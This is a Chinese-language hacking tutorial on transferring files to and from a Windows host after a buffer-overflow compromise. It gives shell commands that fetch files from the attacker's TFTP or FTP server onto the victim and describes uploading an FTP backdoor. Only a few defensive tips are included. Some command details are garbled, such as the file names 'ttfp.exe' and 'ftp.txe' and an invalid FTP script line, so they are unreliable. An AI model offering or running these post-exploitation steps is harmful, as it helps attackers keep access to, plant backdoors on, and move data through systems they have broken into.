一、文件的传输：

    以下所述方法都是在远程主机没有开启共享的条件下实现的。

    1、 打开共享

    使用IDQ、WebDAV等方法对目标进行溢出攻击之后得到system权限，使用net share查看一下共享，发现一个共享都没有打开。没有办法应设对方的硬盘就不方便上传下载文件。

    其实最简单的办法就是打开它的共享，这样，我么就可以映射它的磁盘，实现文件的传输了。 其实要防止这种共享打开是十分简单的，只要网上邻居的属性里面没有添加文件和打印共享就可以实现了。

    2、 使用TFTP工具进行文件传输

    使用TFTP(Trivial File Transfer Protocol)工具来实现文件的传送是一种基于UDP连接的文件传输，一般是使用Windows自带的ttfp.exe和一个TFTP服务端软件构成一个完整的传输结构。

    一般在溢出的Shell、Telnet的Shell中使用，当然也可以在SQL Remote Execute 里面实现。在这样那些没有开设共享的实现主机上传下载文件的工作就可以有这个传输模式来完成。

    首先运行本地的TFTP Server软件并保证始终开启直至传输全部完成， 然后在Shell中运行下面的命令

    C:\winnt\system32>tftp –i 192.168.0.1 get abc.exe 上传文件到Shell目标

    C:\winnt\system32>tftp –i 192.168.0.1 put abc.exe 下载文件到本地主机

    这里你可以在最后面写上你要传送到的路径。

    这里要提到的是，如果使用一个Private IP address 你将不能实现与外部网络的文件传送。因为，你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中，代替你的内部网络地址。所以在外部网络进行MAC寻址是找不到你这台TFTP服务器的。

    想避免这样的传输最直接的办法就是将tftp.exe文件删除，另外你可以使用工具修改列表中的tftp端口号（改为0）。

    3、 使用本地FTP服务进行文件传输

    如果你得到一个Shell，是不能直接远程操作FTP命令行的，所以一般来讲我们都要写一个脚本来实现从FTP主机上下载文件或者上传文件。

    使用echo命令来写这个脚本并执行它：

    C:\winnt\system32>echo open 192.168.0.1 > ftp.txe

    C:\ winnt\system32>echo user:pass@192.168.0.1 >>ftp.txt

    C:\ winnt\system32>echo get abc.exe >>ftp.txt

    C:\ winnt\system32>echo bye >> ftp.txt

    C:\ winnt\system32>ftp –s: ftp.txt

    4、 使用TFTP打开目标FTP服务进行文件传输

    利用TFTP方法上传一个FTP的后门（例如xftpd.exe，好友Hackerhell推荐），在命令行下面执行它。我们就可以得到一个开设FTP的远程主机。利用浏览器或者是其他工具就可以轻松实现文件的传输。